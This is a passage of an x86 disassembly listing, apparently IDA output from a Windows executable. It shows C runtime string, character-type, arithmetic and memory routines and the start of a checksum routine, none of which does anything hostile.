; ---------------------------------------------------------------------------
loc_4CC6E0: ; CODE XREF: sub_4CC640+98�j
pop esi
pop edi
lea eax, [edx-1]
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4CC6E7: ; CODE XREF: sub_4CC640+90�j
lea eax, [edx-2]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4CC6EE: ; CODE XREF: sub_4CC640+85�j
lea eax, [edx-3]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4CC6F5: ; CODE XREF: sub_4CC640+7D�j
lea eax, [edx-4]
pop esi
pop edi
pop ebx
retn
sub_4CC640 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4CC700 proc near ; CODE XREF: sub_4CF252+FB�p
; sub_4D2DD0+161�p ...
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
push edi
mov edi, [ebp+arg_0]
xor eax, eax
or ecx, 0FFFFFFFFh
repne scasb
inc ecx
neg ecx
dec edi
mov al, [ebp+arg_4]
std
repne scasb
inc edi
cmp [edi], al
jz short loc_4CC721
xor eax, eax
jmp short loc_4CC723
; ---------------------------------------------------------------------------
loc_4CC721: ; CODE XREF: sub_4CC700+1B�j
mov eax, edi
loc_4CC723: ; CODE XREF: sub_4CC700+1F�j
cld
pop edi
leave
retn
sub_4CC700 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4CC730 proc near ; CODE XREF: sub_4D153F+5E�p
; sub_4D153F+1AB�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov ecx, [ebp+arg_8]
jecxz short loc_4CC761
mov ebx, ecx
mov edi, [ebp+arg_0]
mov esi, edi
xor eax, eax
repne scasb
neg ecx
add ecx, ebx
mov edi, esi
mov esi, [ebp+arg_4]
repe cmpsb
mov al, [esi-1]
xor ecx, ecx
cmp al, [edi-1]
ja short loc_4CC75F
jz short loc_4CC761
dec ecx
dec ecx
loc_4CC75F: ; CODE XREF: sub_4CC730+29�j
not ecx
loc_4CC761: ; CODE XREF: sub_4CC730+9�j
; sub_4CC730+2B�j
mov eax, ecx
pop ebx
pop esi
pop edi
leave
retn
sub_4CC730 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4CC770 proc near ; CODE XREF: sub_4D1CC4+1AF�p
; sub_4D1CC4+434�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz short loc_4CC7F3
push esi
push ebx
mov ebx, ecx
mov esi, [esp+0Ch+arg_4]
test esi, 3
mov edi, [esp+0Ch+arg_0]
jnz short loc_4CC794
shr ecx, 2
jnz short loc_4CC801
jmp short loc_4CC7B5
; ---------------------------------------------------------------------------
loc_4CC794: ; CODE XREF: sub_4CC770+1B�j
; sub_4CC770+37�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
dec ecx
jz short loc_4CC7C2
test al, al
jz short loc_4CC7CA
test esi, 3
jnz short loc_4CC794
mov ebx, ecx
shr ecx, 2
jnz short loc_4CC801
loc_4CC7B0: ; CODE XREF: sub_4CC770+8F�j
and ebx, 3
jz short loc_4CC7C2
loc_4CC7B5: ; CODE XREF: sub_4CC770+22�j
; sub_4CC770+50�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
test al, al
jz short loc_4CC7EE
dec ebx
jnz short loc_4CC7B5
loc_4CC7C2: ; CODE XREF: sub_4CC770+2B�j
; sub_4CC770+43�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_4CC7CA: ; CODE XREF: sub_4CC770+2F�j
test edi, 3
jz short loc_4CC7E4
loc_4CC7D2: ; CODE XREF: sub_4CC770+72�j
mov [edi], al
inc edi
dec ecx
jz loc_4CC866
test edi, 3
jnz short loc_4CC7D2
loc_4CC7E4: ; CODE XREF: sub_4CC770+60�j
mov ebx, ecx
shr ecx, 2
jnz short loc_4CC857
loc_4CC7EB: ; CODE XREF: sub_4CC770+7F�j
; sub_4CC770+F4�j
mov [edi], al
inc edi
loc_4CC7EE: ; CODE XREF: sub_4CC770+4D�j
dec ebx
jnz short loc_4CC7EB
pop ebx
pop esi
loc_4CC7F3: ; CODE XREF: sub_4CC770+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_4CC7F9: ; CODE XREF: sub_4CC770+A9�j
; sub_4CC770+C1�j
mov [edi], edx
add edi, 4
dec ecx
jz short loc_4CC7B0
loc_4CC801: ; CODE XREF: sub_4CC770+20�j
; sub_4CC770+3E�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_4CC7F9
test dl, dl
jz short loc_4CC84B
test dh, dh
jz short loc_4CC841
test edx, 0FF0000h
jz short loc_4CC837
test edx, 0FF000000h
jnz short loc_4CC7F9
mov [edi], edx
jmp short loc_4CC84F
; ---------------------------------------------------------------------------
loc_4CC837: ; CODE XREF: sub_4CC770+B9�j
and edx, 0FFFFh
mov [edi], edx
jmp short loc_4CC84F
; ---------------------------------------------------------------------------
loc_4CC841: ; CODE XREF: sub_4CC770+B1�j
and edx, 0FFh
mov [edi], edx
jmp short loc_4CC84F
; ---------------------------------------------------------------------------
loc_4CC84B: ; CODE XREF: sub_4CC770+AD�j
xor edx, edx
mov [edi], edx
loc_4CC84F: ; CODE XREF: sub_4CC770+C5�j
; sub_4CC770+CF�j ...
add edi, 4
xor eax, eax
dec ecx
jz short loc_4CC861
loc_4CC857: ; CODE XREF: sub_4CC770+79�j
xor eax, eax
loc_4CC859: ; CODE XREF: sub_4CC770+EF�j
mov [edi], eax
add edi, 4
dec ecx
jnz short loc_4CC859
loc_4CC861: ; CODE XREF: sub_4CC770+E5�j
and ebx, 3
jnz short loc_4CC7EB
loc_4CC866: ; CODE XREF: sub_4CC770+66�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_4CC770 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4CC86E proc near ; CODE XREF: sub_4CC0D6+24�p
; sub_4CC0D6+2F�p ...
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp ds:dword_4E60F4, 0
push ebx
push esi
push edi
jnz short loc_4CC89B
mov eax, [ebp+arg_0]
cmp eax, 41h
jl loc_4CC934
cmp eax, 5Ah
jg loc_4CC934
add eax, 20h
jmp loc_4CC934
; ---------------------------------------------------------------------------
loc_4CC89B: ; CODE XREF: sub_4CC86E+E�j
mov ebx, [ebp+arg_0]
mov edi, 100h
push 1
cmp ebx, edi
pop esi
jge short loc_4CC8CF
cmp ds:dword_4E165C, esi
jle short loc_4CC8BD
push esi
push ebx
call sub_4CCCCF
pop ecx
pop ecx
jmp short loc_4CC8C7
; ---------------------------------------------------------------------------
loc_4CC8BD: ; CODE XREF: sub_4CC86E+42�j
mov eax, ds:off_4E1450
mov al, [eax+ebx*2]
and eax, esi
loc_4CC8C7: ; CODE XREF: sub_4CC86E+4D�j
test eax, eax
jnz short loc_4CC8CF
loc_4CC8CB: ; CODE XREF: sub_4CC86E+AD�j
mov eax, ebx
jmp short loc_4CC934
; ---------------------------------------------------------------------------
loc_4CC8CF: ; CODE XREF: sub_4CC86E+3A�j
; sub_4CC86E+5B�j
mov edx, ds:off_4E1450
mov eax, ebx
sar eax, 8
movzx ecx, al
test byte ptr [edx+ecx*2+1], 80h
jz short loc_4CC8F3
and byte ptr [ebp+arg_0+2], 0
push 2
mov byte ptr [ebp+arg_0], al
mov byte ptr [ebp+arg_0+1], bl
pop eax
jmp short loc_4CC8FC
; ---------------------------------------------------------------------------
loc_4CC8F3: ; CODE XREF: sub_4CC86E+74�j
and byte ptr [ebp+arg_0+1], 0
mov byte ptr [ebp+arg_0], bl
mov eax, esi
loc_4CC8FC: ; CODE XREF: sub_4CC86E+83�j
push esi
push 0
lea ecx, [ebp+var_4]
push 3
push ecx
push eax
lea eax, [ebp+arg_0]
push eax
push edi
push ds:dword_4E60F4
call sub_4CCA80
add esp, 20h
test eax, eax
jz short loc_4CC8CB
cmp eax, esi
jnz short loc_4CC927
movzx eax, [ebp+var_4]
jmp short loc_4CC934
; ---------------------------------------------------------------------------
loc_4CC927: ; CODE XREF: sub_4CC86E+B1�j
movzx eax, [ebp+var_3]
movzx ecx, [ebp+var_4]
shl eax, 8
or eax, ecx
loc_4CC934: ; CODE XREF: sub_4CC86E+16�j
; sub_4CC86E+1F�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_4CC86E endp
; ---------------------------------------------------------------------------
align 10h
push edi
push esi
push ebx
xor edi, edi
mov eax, [esp+14h]
or eax, eax
jge short loc_4CC961
inc edi
mov edx, [esp+10h]
neg eax
neg edx
sbb eax, 0
mov [esp+14h], eax
mov [esp+10h], edx
loc_4CC961: ; CODE XREF: _4:004CC94B�j
mov eax, [esp+1Ch]
or eax, eax
jge short loc_4CC97D
inc edi
mov edx, [esp+18h]
neg eax
neg edx
sbb eax, 0
mov [esp+1Ch], eax
mov [esp+18h], edx
loc_4CC97D: ; CODE XREF: _4:004CC967�j
or eax, eax
jnz short loc_4CC999
mov ecx, [esp+18h]
mov eax, [esp+14h]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+10h]
div ecx
mov edx, ebx
jmp short loc_4CC9DA
; ---------------------------------------------------------------------------
loc_4CC999: ; CODE XREF: _4:004CC97F�j
mov ebx, eax
mov ecx, [esp+18h]
mov edx, [esp+14h]
mov eax, [esp+10h]
loc_4CC9A7: ; CODE XREF: _4:004CC9B1�j
shr ebx, 1
rcr ecx, 1
shr edx, 1
rcr eax, 1
or ebx, ebx
jnz short loc_4CC9A7
div ecx
mov esi, eax
mul dword ptr [esp+1Ch]
mov ecx, eax
mov eax, [esp+18h]
mul esi
add edx, ecx
jb short loc_4CC9D5
cmp edx, [esp+14h]
ja short loc_4CC9D5
jb short loc_4CC9D6
cmp eax, [esp+10h]
jbe short loc_4CC9D6
loc_4CC9D5: ; CODE XREF: _4:004CC9C5�j _4:004CC9CB�j
dec esi
loc_4CC9D6: ; CODE XREF: _4:004CC9CD�j _4:004CC9D3�j
xor edx, edx
mov eax, esi
loc_4CC9DA: ; CODE XREF: _4:004CC997�j
dec edi
jnz short loc_4CC9E4
neg edx
neg eax
sbb edx, 0
loc_4CC9E4: ; CODE XREF: _4:004CC9DB�j
pop ebx
pop esi
pop edi
retn 10h
; =============== S U B R O U T I N E =======================================
sub_4CC9EA proc near ; CODE XREF: sub_4CCA75+4�p
arg_0 = dword ptr 4
push ebx
push ebp
push esi
push edi
mov edi, [esp+10h+arg_0]
loc_4CC9F2: ; CODE XREF: sub_4CC9EA+34�j
cmp ds:dword_4E165C, 1
jle short loc_4CCA0A
movzx eax, byte ptr [edi]
push 8
push eax
call sub_4CCCCF
pop ecx
pop ecx
jmp short loc_4CCA19
; ---------------------------------------------------------------------------
loc_4CCA0A: ; CODE XREF: sub_4CC9EA+F�j
movzx eax, byte ptr [edi]
mov ecx, ds:off_4E1450
mov al, [ecx+eax*2]
and eax, 8
loc_4CCA19: ; CODE XREF: sub_4CC9EA+1E�j
test eax, eax
jz short loc_4CCA20
inc edi
jmp short loc_4CC9F2
; ---------------------------------------------------------------------------
loc_4CCA20: ; CODE XREF: sub_4CC9EA+31�j
movzx esi, byte ptr [edi]
inc edi
cmp esi, 2Dh
mov ebp, esi
jz short loc_4CCA30
cmp esi, 2Bh
jnz short loc_4CCA34
loc_4CCA30: ; CODE XREF: sub_4CC9EA+3F�j
movzx esi, byte ptr [edi]
inc edi
loc_4CCA34: ; CODE XREF: sub_4CC9EA+44�j
xor ebx, ebx
loc_4CCA36: ; CODE XREF: sub_4CC9EA+7B�j
cmp ds:dword_4E165C, 1
jle short loc_4CCA4B
push 4
push esi
call sub_4CCCCF
pop ecx
pop ecx
jmp short loc_4CCA56
; ---------------------------------------------------------------------------
loc_4CCA4B: ; CODE XREF: sub_4CC9EA+53�j
mov eax, ds:off_4E1450
mov al, [eax+esi*2]
and eax, 4
loc_4CCA56: ; CODE XREF: sub_4CC9EA+5F�j
test eax, eax
jz short loc_4CCA67
lea eax, [ebx+ebx*4]
lea ebx, [esi+eax*2-30h]
movzx esi, byte ptr [edi]
inc edi
jmp short loc_4CCA36
; ---------------------------------------------------------------------------
loc_4CCA67: ; CODE XREF: sub_4CC9EA+6E�j
cmp ebp, 2Dh
mov eax, ebx
jnz short loc_4CCA70
neg eax
loc_4CCA70: ; CODE XREF: sub_4CC9EA+82�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_4CC9EA endp
; =============== S U B R O U T I N E =======================================
sub_4CCA75 proc near ; CODE XREF: sub_4DAD0C+5F�p
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_4CC9EA
pop ecx
retn
sub_4CCA75 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4CCA80 proc near ; CODE XREF: sub_4CC86E+A3�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4DEB08
push offset sub_4CC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor edi, edi
cmp ds:dword_4E60E8, edi
jnz short loc_4CCAF6
push edi
push edi
push 1
pop ebx
push ebx
push offset dword_4DEB00
mov esi, 100h
push esi
push edi
call ds:dword_4DE034 ; LCMapStringW
test eax, eax
jz short loc_4CCAD4
mov ds:dword_4E60E8, ebx
jmp short loc_4CCAF6
; ---------------------------------------------------------------------------
loc_4CCAD4: ; CODE XREF: sub_4CCA80+4A�j
push edi
push edi
push ebx
push offset dword_4DEAFC
push esi
push edi
call ds:dword_4DE038 ; LCMapStringA
test eax, eax
jz loc_4CCC0E
mov ds:dword_4E60E8, 2
loc_4CCAF6: ; CODE XREF: sub_4CCA80+2E�j
; sub_4CCA80+52�j
cmp [ebp+arg_C], edi
jle short loc_4CCB0B
push [ebp+arg_C]
push [ebp+arg_8]
call sub_4CCCA4
pop ecx
pop ecx
mov [ebp+arg_C], eax
loc_4CCB0B: ; CODE XREF: sub_4CCA80+79�j
mov eax, ds:dword_4E60E8
cmp eax, 2
jnz short loc_4CCB32
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4DE038 ; LCMapStringA
jmp loc_4CCC10
; ---------------------------------------------------------------------------
loc_4CCB32: ; CODE XREF: sub_4CCA80+93�j
cmp eax, 1
jnz loc_4CCC0E
cmp [ebp+arg_18], edi
jnz short loc_4CCB48
mov eax, ds:dword_4E6104
mov [ebp+arg_18], eax
loc_4CCB48: ; CODE XREF: sub_4CCA80+BE�j
push edi
push edi
push [ebp+arg_C]
push [ebp+arg_8]
mov eax, [ebp+arg_1C]
neg eax
sbb eax, eax
and eax, 8
inc eax
push eax
push [ebp+arg_18]
call ds:dword_4DE044 ; MultiByteToWideChar
mov ebx, eax
mov [ebp+var_1C], ebx
cmp ebx, edi
jz loc_4CCC0E
mov [ebp+var_4], edi
lea eax, [ebx+ebx]
add eax, 3
and al, 0FCh
call sub_4CCD90
mov [ebp+var_18], esp
mov eax, esp
mov [ebp+var_24], eax
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_4CCBA3
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
mov [ebp+var_24], edi
or [ebp+var_4], 0FFFFFFFFh
mov ebx, [ebp+var_1C]
loc_4CCBA3: ; CODE XREF: sub_4CCA80+10E�j
cmp [ebp+var_24], edi
jz short loc_4CCC0E
push ebx
push [ebp+var_24]
push [ebp+arg_C]
push [ebp+arg_8]
push 1
push [ebp+arg_18]
call ds:dword_4DE044 ; MultiByteToWideChar
test eax, eax
jz short loc_4CCC0E
push edi
push edi
push ebx
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4DE034 ; LCMapStringW
mov esi, eax
mov [ebp+var_28], esi
cmp esi, edi
jz short loc_4CCC0E
test byte ptr [ebp+arg_4+1], 4
jz short loc_4CCC22
cmp [ebp+arg_14], edi
jz loc_4CCC9D
cmp esi, [ebp+arg_14]
jg short loc_4CCC0E
push [ebp+arg_14]
push [ebp+arg_10]
push ebx
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4DE034 ; LCMapStringW
test eax, eax
jnz loc_4CCC9D
loc_4CCC0E: ; CODE XREF: sub_4CCA80+66�j
; sub_4CCA80+B5�j ...
xor eax, eax
loc_4CCC10: ; CODE XREF: sub_4CCA80+AD�j
; sub_4CCA80+21F�j
lea esp, [ebp-38h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_4CCC22: ; CODE XREF: sub_4CCA80+160�j
mov [ebp+var_4], 1
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_4CCD90
mov [ebp+var_18], esp
mov ebx, esp
mov [ebp+var_20], ebx
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_4CCC56
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
xor ebx, ebx
or [ebp+var_4], 0FFFFFFFFh
mov esi, [ebp+var_28]
loc_4CCC56: ; CODE XREF: sub_4CCA80+1C2�j
cmp ebx, edi
jz short loc_4CCC0E
push esi
push ebx
push [ebp+var_1C]
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4DE034 ; LCMapStringW
test eax, eax
jz short loc_4CCC0E
cmp [ebp+arg_14], edi
push edi
push edi
jnz short loc_4CCC7D
push edi
push edi
jmp short loc_4CCC83
; ---------------------------------------------------------------------------
loc_4CCC7D: ; CODE XREF: sub_4CCA80+1F7�j
push [ebp+arg_14]
push [ebp+arg_10]
loc_4CCC83: ; CODE XREF: sub_4CCA80+1FB�j
push esi
push ebx
push 220h
push [ebp+arg_18]
call ds:dword_4DE040 ; WideCharToMultiByte
mov esi, eax
cmp esi, edi
jz loc_4CCC0E
loc_4CCC9D: ; CODE XREF: sub_4CCA80+165�j
; sub_4CCA80+188�j
mov eax, esi
jmp loc_4CCC10
sub_4CCA80 endp
; =============== S U B R O U T I N E =======================================
sub_4CCCA4 proc near ; CODE XREF: sub_4CCA80+81�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
mov eax, [esp+arg_0]
test edx, edx
push esi
lea ecx, [edx-1]
jz short loc_4CCCC1
loc_4CCCB4: ; CODE XREF: sub_4CCCA4+1B�j
cmp byte ptr [eax], 0
jz short loc_4CCCC1
inc eax
mov esi, ecx
dec ecx
test esi, esi
jnz short loc_4CCCB4
loc_4CCCC1: ; CODE XREF: sub_4CCCA4+E�j
; sub_4CCCA4+13�j
cmp byte ptr [eax], 0
pop esi
jnz short loc_4CCCCC
sub eax, [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_4CCCCC: ; CODE XREF: sub_4CCCA4+21�j
mov eax, edx
retn
sub_4CCCA4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4CCCCF proc near ; CODE XREF: sub_4CC86E+46�p
; sub_4CC9EA+17�p ...
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
lea ecx, [eax+1]
cmp ecx, 100h
ja short loc_4CCCED
mov ecx, ds:off_4E1450
movzx eax, word ptr [ecx+eax*2]
jmp short loc_4CCD3F
; ---------------------------------------------------------------------------
loc_4CCCED: ; CODE XREF: sub_4CCCCF+10�j
mov ecx, eax
push esi
mov esi, ds:off_4E1450
sar ecx, 8
movzx edx, cl
test byte ptr [esi+edx*2+1], 80h
pop esi
jz short loc_4CCD12
and [ebp+var_2], 0
mov [ebp+var_4], cl
mov [ebp+var_3], al
push 2
jmp short loc_4CCD1B
; ---------------------------------------------------------------------------
loc_4CCD12: ; CODE XREF: sub_4CCCCF+33�j
and [ebp+var_3], 0
mov [ebp+var_4], al
push 1
loc_4CCD1B: ; CODE XREF: sub_4CCCCF+41�j
pop eax
lea ecx, [ebp+arg_0+2]
push 1
push 0
push 0
push ecx
push eax
lea eax, [ebp+var_4]
push eax
push 1
call sub_4CCDBF
add esp, 1Ch
test eax, eax
jnz short loc_4CCD3B
leave
retn
; ---------------------------------------------------------------------------
loc_4CCD3B: ; CODE XREF: sub_4CCCCF+68�j
movzx eax, word ptr [ebp+arg_0+2]
loc_4CCD3F: ; CODE XREF: sub_4CCCCF+1C�j
and eax, [ebp+arg_4]
leave
retn
sub_4CCCCF endp
; ---------------------------------------------------------------------------
align 10h
mov eax, [esp+8]
mov ecx, [esp+10h]
or ecx, eax
mov ecx, [esp+0Ch]
jnz short loc_4CCD69
mov eax, [esp+4]
mul ecx
retn 10h
; ---------------------------------------------------------------------------
loc_4CCD69: ; CODE XREF: _4:004CCD5E�j
push ebx
mul ecx
mov ebx, eax
mov eax, [esp+8]
mul dword ptr [esp+14h]
add ebx, eax
mov eax, [esp+8]
mul ecx
add edx, ebx
pop ebx
retn 10h
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4CCD90 proc near ; CODE XREF: sub_4CCA80+FD�p
; sub_4CCA80+1B1�p ...
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_4CCDB0
loc_4CCD9C: ; CODE XREF: sub_4CCD90+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_4CCD9C
loc_4CCDB0: ; CODE XREF: sub_4CCD90+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_4CCD90 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4CCDBF proc near ; CODE XREF: sub_4CCCCF+5E�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4DEB20
push offset sub_4CC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 18h
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, ds:dword_4E610C
xor ebx, ebx
cmp eax, ebx
jnz short loc_4CCE2E
lea eax, [ebp+var_1C]
push eax
push 1
pop esi
push esi
push offset dword_4DEB00
push esi
call ds:dword_4DE048 ; GetStringTypeW
test eax, eax
jz short loc_4CCE0C
mov eax, esi
jmp short loc_4CCE29
; ---------------------------------------------------------------------------
loc_4CCE0C: ; CODE XREF: sub_4CCDBF+47�j
lea eax, [ebp+var_1C]
push eax
push esi
push offset dword_4DEAFC
push esi
push ebx
call ds:dword_4DE030 ; GetStringTypeA
test eax, eax
jz loc_4CCEF4
push 2
pop eax
loc_4CCE29: ; CODE XREF: sub_4CCDBF+4B�j
mov ds:dword_4E610C, eax
loc_4CCE2E: ; CODE XREF: sub_4CCDBF+2F�j
cmp eax, 2
jnz short loc_4CCE57
mov eax, [ebp+arg_14]
cmp eax, ebx
jnz short loc_4CCE3F
mov eax, ds:dword_4E60F4
loc_4CCE3F: ; CODE XREF: sub_4CCDBF+79�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push eax
call ds:dword_4DE030 ; GetStringTypeA
jmp loc_4CCEF6
; ---------------------------------------------------------------------------
loc_4CCE57: ; CODE XREF: sub_4CCDBF+72�j
cmp eax, 1
jnz loc_4CCEF4
cmp [ebp+arg_10], ebx
jnz short loc_4CCE6D
mov eax, ds:dword_4E6104
mov [ebp+arg_10], eax
loc_4CCE6D: ; CODE XREF: sub_4CCDBF+A4�j
push ebx
push ebx
push [ebp+arg_8]
push [ebp+arg_4]
mov eax, [ebp+arg_18]
neg eax
sbb eax, eax
and eax, 8
inc eax
push eax
push [ebp+arg_10]
call ds:dword_4DE044 ; MultiByteToWideChar
mov [ebp+var_20], eax
cmp eax, ebx
jz short loc_4CCEF4
mov [ebp+var_4], ebx
lea edi, [eax+eax]
mov eax, edi
add eax, 3
and al, 0FCh
call sub_4CCD90
mov [ebp+var_18], esp
mov esi, esp
mov [ebp+var_24], esi
push edi
push ebx
push esi
call sub_4CCF10
add esp, 0Ch
jmp short loc_4CCEC3
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor ebx, ebx
xor esi, esi
loc_4CCEC3: ; CODE XREF: sub_4CCDBF+F7�j
or [ebp+var_4], 0FFFFFFFFh
cmp esi, ebx
jz short loc_4CCEF4
push [ebp+var_20]
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push 1
push [ebp+arg_10]
call ds:dword_4DE044 ; MultiByteToWideChar
cmp eax, ebx
jz short loc_4CCEF4
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_0]
call ds:dword_4DE048 ; GetStringTypeW
jmp short loc_4CCEF6
; ---------------------------------------------------------------------------
loc_4CCEF4: ; CODE XREF: sub_4CCDBF+61�j
; sub_4CCDBF+9B�j ...
xor eax, eax
loc_4CCEF6: ; CODE XREF: sub_4CCDBF+93�j
; sub_4CCDBF+133�j
lea esp, [ebp-34h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_4CCDBF endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4CCF10 proc near ; CODE XREF: sub_4CCDBF+EF�p
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_8]
mov ecx, [esp+arg_0]
test edx, edx
jz short loc_4CCF63
xor eax, eax
mov al, [esp+arg_4]
push edi
mov edi, ecx
cmp edx, 4
jb short loc_4CCF57
neg ecx
and ecx, 3
jz short loc_4CCF39
sub edx, ecx
loc_4CCF33: ; CODE XREF: sub_4CCF10+27�j
mov [edi], al
inc edi
dec ecx
jnz short loc_4CCF33
loc_4CCF39: ; CODE XREF: sub_4CCF10+1F�j
mov ecx, eax
shl eax, 8
add eax, ecx
mov ecx, eax
shl eax, 10h
add eax, ecx
mov ecx, edx
and edx, 3
shr ecx, 2
jz short loc_4CCF57
rep stosd
test edx, edx
jz short loc_4CCF5D
loc_4CCF57: ; CODE XREF: sub_4CCF10+18�j
; sub_4CCF10+3F�j ...
mov [edi], al
inc edi
dec edx
jnz short loc_4CCF57
loc_4CCF5D: ; CODE XREF: sub_4CCF10+45�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_4CCF63: ; CODE XREF: sub_4CCF10+A�j
mov eax, [esp+arg_0]
retn
sub_4CCF10 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4CCF68 proc near ; CODE XREF: sub_4CC454+13�p
jmp ds:dword_4DE03C
sub_4CCF68 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4CCF6E proc near ; CODE XREF: sub_4CD2E0+183�p
; sub_4CD2E0+361�p
; DATA XREF: ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_4]
push esi
push edi
mov edi, [ebp+arg_0]
mov esi, edi
and esi, 0FFFFh
shr edi, 10h
test ecx, ecx
jnz short loc_4CCF90
push 1
pop eax
jmp loc_4CD083
; ---------------------------------------------------------------------------
loc_4CCF90: ; CODE XREF: sub_4CCF6E+18�j
cmp [ebp+arg_8], 0
jbe loc_4CD07C
push ebx
loc_4CCF9B: ; CODE XREF: sub_4CCF6E+107�j
mov edx, 15B0h
cmp [ebp+arg_8], edx
jnb short loc_4CCFA8
mov edx, [ebp+arg_8]
loc_4CCFA8: ; CODE XREF: sub_4CCF6E+35�j
sub [ebp+arg_8], edx
cmp edx, 10h
jl loc_4CD04B
mov eax, edx
shr eax, 4
mov ebx, eax
neg ebx
shl ebx, 4
add edx, ebx
loc_4CCFC2: ; CODE XREF: sub_4CCF6E+D7�j
movzx ebx, byte ptr [ecx]
add esi, ebx
movzx ebx, byte ptr [ecx+1]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+2]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+3]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+4]
